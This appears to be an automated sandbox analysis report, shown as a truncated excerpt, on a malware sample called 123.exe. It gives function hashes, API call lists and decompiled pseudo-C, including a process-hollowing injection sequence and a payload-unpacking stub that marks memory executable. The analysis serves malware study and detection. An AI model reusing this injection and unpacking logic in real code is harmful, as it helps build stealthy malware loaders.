Opcode ID: 4ff6442fdcbd63205052fc5d5bf503bf4be32889d92b2bddb230eac73fdc815e
Instruction ID: e87c6a6151afda36a1aef972dd1738a186746d4c92c212382faaa76b768002cc
Opcode Fuzzy Hash: 4ff6442fdcbd63205052fc5d5bf503bf4be32889d92b2bddb230eac73fdc815e
Instruction Fuzzy Hash: C5C0803124071066EB3017747D0DF476ED85B01F15F05049DB141EB1E1DEE6C940C7E0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 123.exePID: 5180, Parent PID: 5296COMMON

Executed Functions

Function 001EF801 Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 467
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 001EFAE2
GetThreadContext.KERNELBASE(?,00010007), ref: 001EFAF7
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 001EFB18
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001EFB4A
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 001EFB6A
WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 001EFC9D
VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 001EFCBA
VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 001EFD24
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 001EFD46
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 001EFD61
SetThreadContext.KERNELBASE(?,00010007), ref: 001EFD7E
ResumeThread.KERNELBASE(?), ref: 001EFD8B

Strings

D, xrefs: 001EFA3A

Memory Dump Source

Source File: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
String ID: D
API String ID: 12256240-2746444292
Opcode ID: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction ID: 1b336959c0fecf99311b5cb369138701ab6b49fce2886b5c9a9f3044e4266d7a
Opcode Fuzzy Hash: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction Fuzzy Hash: 20122971E006599BDF25CFA5CC84BEEBBB5FF08704F1484AAE909E6250E7709A85CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00191F6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00191F6D(void* __eflags, void* __fp0) {
				signed int _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t20;
				intOrPtr* _t26;
				intOrPtr _t28;
				void* _t29;
				void* _t39;
				intOrPtr* _t43;
				void* _t45;
				intOrPtr _t49;
				void* _t58;
				void* _t66;
				long _t67;
				void* _t70;
				void* _t71;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				signed int _t77;
				signed int _t79;
				void* _t82;
				void* _t92;

				_t92 = __fp0;
				_t82 = __eflags;
				_t77 = _t79;
				_t20 =  *0x1c3014; // 0x88921fa2
				_v8 = _t20 ^ _t77;
				_push(_t71);
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x10], xmm0");
				 *0x1f113c = GetModuleHandleA("kernel32.dll");
				_t43 = E00197F22(_t71, _t82, 0x14);
				_t67 = 0;
				 *_t43 = 0;
				_t3 = _t43 + 8; // 0x8
				_t72 = _t3;
				 *((intOrPtr*)(_t43 + 4)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				 *((intOrPtr*)(_t43 + 0x10)) = 0;
				 *_t72 = 0;
				 *((intOrPtr*)(_t72 + 4)) = 0;
				 *((intOrPtr*)(_t72 + 8)) = 0;
				_v12 = 0x84;
				E00194F83(_t43, _t72, 0, _t72, 0, 0,  &_v12, _t66);
				do {
					 *_t43 = _t67;
					_t26 =  *((intOrPtr*)(_t72 + 4));
					if(_t26 ==  *((intOrPtr*)(_t72 + 8))) {
						_push(_t43);
						_push(_t26);
						E00194F83(_t43, _t72, _t67, _t72, __eflags);
					} else {
						 *_t26 = _t67;
						 *((intOrPtr*)(_t72 + 4)) =  *((intOrPtr*)(_t72 + 4)) + 4;
					}
					_t67 = _t67 + 1;
				} while (_t67 < 0x64);
				_t49 = _v16;
				_t28 = _v20;
				do {
					_t28 = _t28 + 1;
					asm("adc ecx, ebx");
				} while (_t28 == 0 && _t28 <= 0x5f5e100);
				_t29 = _t28 + 1;
				asm("adc ecx, ebx");
				_v16 = _t49;
				if(_t29 != 0 || _t29 >= 0x5f5e0ff) {
					_push(_t49);
					_t73 =  &E001EF680;
					E00191DA9(_t73, 0x77e, _t92);
					E00191DA9(0x1c3a80, 0x2bc00, _t92);
					_v12 = 0;
					E00191E14();
					VirtualProtect(_t73, 0x77e, 0x40,  &_v12); // executed
					_push(0x1c3a80);
					_push(0);
					_push( *0x1efe00);
					asm("loop 0xffffffff");
					_t39 =  &E001EF680 + 0x22;
					_push(0);
					_push(_t39);
					return _t39;
				} else {
					_pop(_t70);
					_pop(_t75);
					__eflags = _v8 ^ _t77;
					_pop(_t45);
					return E00197F14(0, _t45, _v8 ^ _t77, _t58, _t70, _t75);
				}
			}

0x00191f6d
0x00191f6d
0x00191f6e
0x00191f73
0x00191f7a
0x00191f7e
0x00191f80
0x00191f88
0x00191f95
0x00191f9f
0x00191fa1
0x00191fa8
0x00191faa
0x00191faa
0x00191fad
0x00191fb2
0x00191fb5
0x00191fb9
0x00191fbb
0x00191fbe
0x00191fc1
0x00191fc8
0x00191fcd
0x00191fcd
0x00191fcf
0x00191fd5
0x00191fdf
0x00191fe0
0x00191fe3
0x00191fd7
0x00191fd7
0x00191fd9
0x00191fd9
0x00191fe8
0x00191fe9
0x00191fee
0x00191ff3
0x00191ff6
0x00191ff6
0x00191ff9
0x00191ff9
0x00192004
0x00192007
0x00192009
0x0019200c
0x00192015
0x0019201b
0x00192024
0x00192033
0x00192039
0x0019203c
0x0019204f
0x00192058
0x0019205d
0x00192069
0x0019207c
0x0019207e
0x00192080
0x00192082
0x00192083
0x00192093
0x00192098
0x00192099
0x0019209a
0x0019209c
0x001920a3
0x001920a3

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00191F8D

Part of subcall function 00194F83: __EH_prolog3_catch.LIBCMT ref: 00194F8A

VirtualProtect.KERNELBASE(001EF680,0000077E,00000040,00000084,?,00000000,00000000,?), ref: 0019204F

Strings

kernel32.dll, xrefs: 00191F83

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchHandleModuleProtectVirtual
String ID: kernel32.dll
API String ID: 2053513580-1793498882
Opcode ID: e01f6fc6c459eb6baa1eadc401b81cd5b0d834e7720f13fec91a559e6e5a3183
Instruction ID: c3150c125b1032eb78290357bb15053c2458b7c60cfcd7f75b7f110fecdeec04
Opcode Fuzzy Hash: e01f6fc6c459eb6baa1eadc401b81cd5b0d834e7720f13fec91a559e6e5a3183
Instruction Fuzzy Hash: 3031D2B2A00204ABDF14DF6ADC81A6EB7E9FFD8300F15846EE516DB351CB709D418B50

Uniqueness

Uniqueness Score: -1.00%

Function 0019862B Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0019862B() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00198637); // executed
				return _t1;
			}

0x00198630
0x00198636

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00008637,00197D7B), ref: 00198630

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7a91c95ccb261d6efb3057ba5a37d322d1051352c63fa571dcd62bf898ca4a5d
Instruction ID: e39dbcac005c52964a964c18375f9db7f2e1fc244350cc10a1c29fc1d8769549
Opcode Fuzzy Hash: 7a91c95ccb261d6efb3057ba5a37d322d1051352c63fa571dcd62bf898ca4a5d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 001A7D4A Relevance: 7.7, APIs: 5, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E001A7D4A(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				void* _t53;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x1c3014; // 0x88921fa2
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E001A26ED(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E001AC0C6(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E00197F14(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E00197CA5(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E001AC0C6(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t53 = E001A85E9(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0); // executed
						_t95 = _t53;
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E001A85E9(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E00197CA5(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E001AC142();
									if(_t95 != 0) {
										E00197CA5(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E001A871A(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E00198390(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E001A85E9(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E001A871A(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E00198390(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x001a7d4f
0x001a7d50
0x001a7d51
0x001a7d58
0x001a7d5d
0x001a7d63
0x001a7d69
0x001a7d6f
0x001a7d72
0x001a7d72
0x001a7d75
0x001a7d77
0x001a7d77
0x001a7d75
0x001a7d79
0x001a7d7e
0x001a7d85
0x001a7d88
0x001a7d88
0x001a7da9
0x001a7dab
0x001a7dae
0x001a7db3
0x001a7f11
0x001a7f14
0x001a7f15
0x001a7f16
0x001a7f22
0x001a7db9
0x001a7dbc
0x001a7dc1
0x001a7dc3
0x001a7dc5
0x001a7dfc
0x001a7dfe
0x001a7e00
0x001a7f06
0x001a7f06
0x001a7f08
0x001a7f09
0x001a7f0f
0x00000000
0x001a7f0f
0x001a7e0f
0x001a7e14
0x001a7e19
0x00000000
0x00000000
0x001a7e1f
0x001a7e31
0x001a7e36
0x001a7e3a
0x00000000
0x00000000
0x001a7e40
0x001a7e48
0x001a7e85
0x001a7e8a
0x001a7e8c
0x001a7e8e
0x001a7ebf
0x001a7ec1
0x001a7ec3
0x001a7eff
0x001a7f00
0x00000000
0x001a7ee0
0x001a7ee2
0x001a7ee3
0x001a7ee7
0x001a7f23
0x001a7f26
0x001a7ee9
0x001a7ee9
0x001a7eea
0x001a7eea
0x001a7eeb
0x001a7eec
0x001a7eed
0x001a7eee
0x001a7ef6
0x001a7efd
0x001a7f2c
0x00000000
0x00000000
0x00000000
0x00000000
0x001a7efd
0x001a7ec3
0x001a7e92
0x001a7ead
0x001a7eb2
0x00000000
0x00000000
0x001a7eb4
0x001a7eba
0x001a7eba
0x00000000
0x001a7eba
0x001a7e94
0x001a7e99
0x001a7e9d
0x00000000
0x00000000
0x001a7e9f
0x00000000
0x001a7e9f
0x001a7e4a
0x001a7e4f
0x00000000
0x00000000
0x001a7e57
0x00000000
0x00000000
0x001a7e73
0x001a7e77
0x00000000
0x00000000
0x00000000
0x001a7e7d
0x001a7dcc
0x001a7de7
0x001a7dec
0x001a7df7
0x001a7df7
0x00000000
0x001a7df7
0x001a7dee
0x001a7df4
0x001a7df4
0x00000000
0x001a7df4
0x001a7dce
0x001a7dd3
0x001a7dd7
0x00000000
0x00000000
0x001a7dd9
0x00000000
0x001a7dd9

APIs

__alloca_probe_16.LIBCMT ref: 001A7DCE
__alloca_probe_16.LIBCMT ref: 001A7E94
__freea.LIBCMT ref: 001A7F00

Part of subcall function 001A871A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00198B75,?,?,?,?,?,00191221,?,?), ref: 001A874C

__freea.LIBCMT ref: 001A7F09
__freea.LIBCMT ref: 001A7F2C

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: f056b074a52eaddbe90288f221a31732c8cb3b1372af6f64f02a39a8e79950c8
Instruction ID: e485a67b23e388493223c7267f658b9bd7073902155ee9c690adc14ed0be5eda
Opcode Fuzzy Hash: f056b074a52eaddbe90288f221a31732c8cb3b1372af6f64f02a39a8e79950c8
Instruction Fuzzy Hash: C3511A7A604206AFEF255FA4CC41EBB7BA9EF96760F154168FD14D71C0EB30DE1186A0

Uniqueness

Uniqueness Score: -1.00%

Function 001A3ED2 Relevance: 7.7, APIs: 5, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E001A3ED2(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t249;
				signed int _t251;
				void* _t254;
				signed int _t257;
				signed int _t259;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t280;
				signed int _t287;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				intOrPtr _t292;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t301;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t310;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t334;
				void* _t335;
				signed int _t337;
				void* _t338;
				intOrPtr _t339;
				signed int _t343;
				signed int _t344;
				intOrPtr* _t349;
				signed int _t363;
				signed int _t365;
				void* _t366;
				signed int _t367;
				intOrPtr* _t368;
				signed int _t370;
				void* _t371;
				void* _t375;
				signed int _t379;
				intOrPtr* _t380;
				intOrPtr* _t383;
				void* _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t391;
				char* _t398;
				intOrPtr _t402;
				intOrPtr* _t403;
				signed int _t405;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t415;
				intOrPtr* _t416;
				signed int _t425;
				short _t426;
				signed int _t428;
				intOrPtr _t429;
				void* _t430;
				signed int _t432;
				intOrPtr _t433;
				void* _t434;
				signed int _t435;
				signed int _t438;
				intOrPtr _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				signed int _t448;
				void* _t450;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int* _t458;
				short _t459;
				signed int _t461;
				signed int _t462;
				void* _t464;
				void* _t465;
				signed int _t466;
				void* _t467;
				void* _t468;
				signed int _t469;
				void* _t471;
				void* _t472;
				signed int _t484;

				_t424 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t249 = E001A871A(0x6a6); // executed
				_t363 = _t249;
				_t250 = 0;
				_pop(_t375);
				if(_t363 == 0) {
					L20:
					return _t250;
				} else {
					_push(__edi);
					 *_t363 = 1;
					_t2 = _t363 + 4; // 0x4
					_t428 = _t2;
					_t444 = _a4;
					 *_t428 = 0;
					_t251 = _t444 + 0x30;
					_push( *_t251);
					_v16 = _t251;
					_push(0x1b72d8);
					_push( *0x1b7214);
					E001A3E0E(_t363, _t375, __edx, _t428, _t444, _t428, 0x351, 3);
					_t465 = _t464 + 0x18;
					_v8 = 0x1b7214;
					while(1) {
						L2:
						_t254 = E001AC3EA(_t428, 0x351, 0x1b72d4);
						_t466 = _t465 + 0xc;
						if(_t254 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t343 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							_v20 = _t416;
							goto L4;
						}
						while(1) {
							L4:
							_t424 =  *_t343;
							if(_t424 !=  *_t416) {
								break;
							}
							if(_t424 == 0) {
								L8:
								_t344 = 0;
							} else {
								_t424 =  *((intOrPtr*)(_t343 + 2));
								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t343 = _t343 + 4;
									_t416 = _t416 + 4;
									if(_t424 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x1b72d8);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t344);
							_t349 = _v8 + 0xc;
							_v8 = _t349;
							_push( *_t349);
							E001A3E0E(_t363, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
							_t465 = _t466 + 0x18;
							if(_v8 < 0x1b7244) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E001A71B2(_t363);
									_t435 = _t428 | 0xffffffff;
									__eflags =  *(_t444 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E001A71B2( *(_t444 + 0x28));
										}
									}
									__eflags =  *(_t444 + 0x24);
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t435 == 1;
										if(_t435 == 1) {
											E001A71B2( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) = 0;
									 *(_t444 + 0x1c) = 0;
									 *(_t444 + 0x28) = 0;
									 *((intOrPtr*)(_t444 + 0x20)) = 0;
									_t250 =  *((intOrPtr*)(_t444 + 0x40));
								} else {
									_t438 = _t428 | 0xffffffff;
									_t484 =  *(_t444 + 0x28);
									if(_t484 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t484 == 0) {
											E001A71B2( *(_t444 + 0x28));
										}
									}
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t438 == 1) {
											E001A71B2( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
									_t28 = _t363 + 4; // 0x4
									_t250 = _t28;
									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
									 *(_t444 + 0x28) = _t363;
									 *((intOrPtr*)(_t444 + 0x20)) = _t250;
								}
								goto L20;
							}
							goto L134;
						}
						asm("sbb eax, eax");
						_t344 = _t343 | 0x00000001;
						__eflags = _t344;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E001A016C();
					asm("int3");
					_t461 = _t466;
					_t467 = _t466 - 0x1d0;
					_t257 =  *0x1c3014; // 0x88921fa2
					_v60 = _t257 ^ _t461;
					_t259 = _v44;
					_push(_t363);
					_push(_t444);
					_t445 = _v40;
					_push(_t428);
					_t429 = _v48;
					_v512 = _t429;
					__eflags = _t259;
					if(_t259 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t365 = 0;
						_v452 = 0;
						__eflags = _t445;
						if(__eflags == 0) {
							L79:
							_t259 = E001A3ED2(_t365, _t424, _t429, _t445, __eflags, _t429); // executed
							goto L80;
						} else {
							__eflags =  *_t445 - 0x4c;
							if( *_t445 != 0x4c) {
								L59:
								_t259 = E001A3A48(_t365, _t424, _t429, _t445, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t468 = _t467 + 0x18;
								__eflags = _t259;
								if(_t259 != 0) {
									_t379 = 0;
									__eflags = 0;
									_t425 = _t429 + 0x20;
									_t447 = 0;
									_v452 = _t425;
									do {
										__eflags = _t447;
										if(_t447 == 0) {
											L74:
											_t265 = _v460;
										} else {
											_t380 =  *_t425;
											_t266 =  &_v276;
											while(1) {
												__eflags =  *_t266 -  *_t380;
												_t429 = _v464;
												if( *_t266 !=  *_t380) {
													break;
												}
												__eflags =  *_t266;
												if( *_t266 == 0) {
													L67:
													_t379 = 0;
													_t267 = 0;
												} else {
													_t426 =  *((intOrPtr*)(_t266 + 2));
													__eflags = _t426 -  *((intOrPtr*)(_t380 + 2));
													_v454 = _t426;
													_t425 = _v452;
													if(_t426 !=  *((intOrPtr*)(_t380 + 2))) {
														break;
													} else {
														_t266 = _t266 + 4;
														_t380 = _t380 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t267;
												if(_t267 == 0) {
													_t365 = _t365 + 1;
													__eflags = _t365;
													goto L74;
												} else {
													_t268 =  &_v276;
													_push(_t268);
													_push(_t447);
													_push(_t429);
													L83();
													_t425 = _v452;
													_t468 = _t468 + 0xc;
													__eflags = _t268;
													if(_t268 == 0) {
														_t379 = 0;
														_t265 = 0;
														_v460 = 0;
													} else {
														_t365 = _t365 + 1;
														_t379 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t267 = _t266 | 0x00000001;
											_t379 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t447 = _t447 + 1;
										_t425 = _t425 + 0x10;
										_v452 = _t425;
										__eflags = _t447 - 5;
									} while (_t447 <= 5);
									__eflags = _t265;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t365;
										if(__eflags != 0) {
											goto L79;
										} else {
											_t259 = _t379;
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t445 + 2) - 0x43;
								if( *(_t445 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
									if( *((short*)(_t445 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t269 = E001AE8A0(_t445, 0x1b72cc);
											_t367 = _t269;
											_v468 = _t367;
											_pop(_t382);
											__eflags = _t367;
											if(_t367 == 0) {
												break;
											}
											_t270 = _t269 - _t445;
											__eflags = _t270;
											_v460 = _t270 >> 1;
											if(_t270 == 0) {
												break;
											} else {
												_t272 = 0x3b;
												__eflags =  *_t367 - _t272;
												if( *_t367 == _t272) {
													break;
												} else {
													_t432 = _v460;
													_t368 = 0x1b7214;
													_v456 = 1;
													do {
														_t273 = E001A5868( *_t368, _t445, _t432);
														_t467 = _t467 + 0xc;
														__eflags = _t273;
														if(_t273 != 0) {
															goto L45;
														} else {
															_t383 =  *_t368;
															_t424 = _t383 + 2;
															do {
																_t339 =  *_t383;
																_t383 = _t383 + 2;
																__eflags = _t339 - _v472;
															} while (_t339 != _v472);
															_t382 = _t383 - _t424 >> 1;
															__eflags = _t432 - _t383 - _t424 >> 1;
															if(_t432 != _t383 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t368 = _t368 + 0xc;
														__eflags = _t368 - 0x1b7244;
													} while (_t368 <= 0x1b7244);
													_t365 = _v468 + 2;
													_t274 = E001AE847(_t382, _t365, 0x1b72d4);
													_t429 = _v464;
													_t448 = _t274;
													_pop(_t386);
													__eflags = _t448;
													if(_t448 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t387 = _v452;
															goto L54;
														} else {
															_push(_t448);
															_t277 = E001AC52A( &_v276, 0x83, _t365);
															_t469 = _t467 + 0x10;
															__eflags = _t277;
